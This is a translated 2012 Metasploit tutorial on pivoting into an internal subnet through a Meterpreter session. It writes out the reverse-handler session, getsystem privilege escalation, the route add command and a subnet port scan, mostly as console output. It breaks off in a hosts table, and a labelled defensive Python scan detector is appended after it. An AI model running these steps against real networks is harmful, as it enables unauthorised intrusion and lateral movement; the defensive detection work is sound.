
Metasploit Cross-Router Access (Pivoting Through a Meterpreter Session)

2012-11-05 07:20:00    Source: fuzzexp.org    Author: Dis9Team

First, obtain a shell on a host inside the internal network and escalate to SYSTEM privileges:

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800

meterpreter > getuid
Server username: BRK-FC17123537C\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Next, look at which network segment the host sits on:

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - 数据包计划程序微型端口
Hardware MAC : 00:50:56:28:2c:de
MTU          : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0

meterpreter >
Try pinging 5.5.5.9 from the attacking machine:

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > ping 5.5.5.9
[*] exec: ping 5.5.5.9

^CInterrupt: use the 'exit' command to quit
msf  exploit(handler) >
No response, so the subnet is not directly reachable. Next, check the routing information from inside the session:

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway    Metric  Interface
    ------           -------          -------    ------  ---------
    0.0.0.0          0.0.0.0          5.5.5.2    10      2
    5.5.5.0          255.255.255.0    5.5.5.9    10      2
    5.5.5.9          255.255.255.255  127.0.0.1  10      1
    5.255.255.255    255.255.255.255  5.5.5.9    10      2
    127.0.0.0        255.0.0.0        127.0.0.1  1       1
    224.0.0.0        240.0.0.0        5.5.5.9    10      2
    255.255.255.255  255.255.255.255  5.5.5.9    1       2

No IPv6 routes were found.
meterpreter >
Look up the local subnets of the compromised host:

Local subnet: 5.5.5.0/255.255.255.0
There is only one subnet, so try adding a route for it:

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > route add 5.5.5.0 255.255.255.0 1
[*] Route added
msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   5.5.5.0            255.255.255.0      Session 1

msf  exploit(handler) >
Note: the final 1 in msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1 is the Meterpreter session ID, not part of the network address; don't get it wrong when adding the route.

Now test the route with a port scan through the session:

msf  exploit(handler) > use auxiliary/scanner/portscan/tcp
msf  auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf  auxiliary(tcp) > set RHOSTS 5.5.5.0-254
RHOSTS => 5.5.5.0-254
msf  auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
PORTS => 22,445,135,443,80,1433
msf  auxiliary(tcp) > exploit

[*] 5.5.5.1:445 - TCP OPEN
[*] 5.5.5.1:135 - TCP OPEN
[*] 5.5.5.1:443 - TCP OPEN
[*] 5.5.5.3:22 - TCP OPEN
[*] 5.5.5.3:80 - TCP OPEN
[*] 5.5.5.4:22 - TCP OPEN
[*] 5.5.5.5:22 - TCP OPEN
[*] 5.5.5.6:80 - TCP OPEN
[*] 5.5.5.6:135 - TCP OPEN
[*] 5.5.5.6:1433 - TCP OPEN
[*] 5.5.5.6:445 - TCP OPEN
----- output omitted -----
View the results stored in the database:

msf  auxiliary(tcp) > hosts

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose   info  comment
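A defender-side illustration added here, not part of the original post: once the route above exists, the scan is proxied through the compromised host, so from inside the 5.5.5.0/24 segment it appears as 5.5.5.9 fanning out to many neighbours on a handful of ports within seconds. The Python below runs a simple sliding-window fan-out detector over constructed connection-log lines; the log format, field names and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection-log lines (assumed format, not from the post): one host
# in 5.5.5.0/24 touching many neighbours on a few ports within a few seconds,
# which is how a scan pivoted through a Meterpreter route looks from inside.
# Denied attempts are just as telling as allowed ones, so both are kept.
SAMPLE_LOG = """\
2012-11-04T20:55:01 src=5.5.5.9 dst=5.5.5.1 dport=445 action=allow
2012-11-04T20:55:01 src=5.5.5.9 dst=5.5.5.1 dport=135 action=allow
2012-11-04T20:55:02 src=5.5.5.9 dst=5.5.5.3 dport=22 action=allow
2012-11-04T20:55:02 src=5.5.5.9 dst=5.5.5.3 dport=80 action=allow
2012-11-04T20:55:03 src=5.5.5.9 dst=5.5.5.4 dport=22 action=allow
2012-11-04T20:55:03 src=5.5.5.9 dst=5.5.5.5 dport=22 action=allow
2012-11-04T20:55:04 src=5.5.5.9 dst=5.5.5.6 dport=1433 action=allow
2012-11-04T20:55:04 src=5.5.5.9 dst=5.5.5.6 dport=443 action=deny
2012-11-04T20:55:30 src=5.5.5.3 dst=5.5.5.6 dport=1433 action=allow
2012-11-04T20:57:10 src=5.5.5.3 dst=5.5.5.1 dport=445 action=allow
"""


def parse_line(line):
    """Split one 'ts key=value ...' line into (timestamp, src, dst, dport)."""
    ts, *kv = line.split()
    fields = dict(pair.split("=", 1) for pair in kv)
    return datetime.fromisoformat(ts), fields["src"], fields["dst"], int(fields["dport"])


def detect_fan_out(log, window=timedelta(seconds=60), min_hosts=4):
    """Return {src: (hosts, ports)} for every source that contacts at least
    `min_hosts` distinct destinations inside any `window`-long time span.
    Normal peer-to-peer traffic (see 5.5.5.3 above) stays below the threshold."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        if line.strip():
            ts, src, dst, dport = parse_line(line)
            by_src[src].append((ts, dst, dport))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end, (ts, _, _) in enumerate(events):
            while ts - events[start][0] > window:  # slide the window forward
                start += 1
            hosts = {d for _, d, _ in events[start:end + 1]}
            ports = {p for _, _, p in events[start:end + 1]}
            if len(hosts) >= min_hosts:
                prev = hits.get(src, (set(), set()))
                hits[src] = (prev[0] | hosts, prev[1] | ports)
    return hits
```

In a real deployment the same logic would read firewall or NetFlow records for the segment; the point is that pivoted scans originate from an already-trusted internal address, so source reputation alone will not catch them.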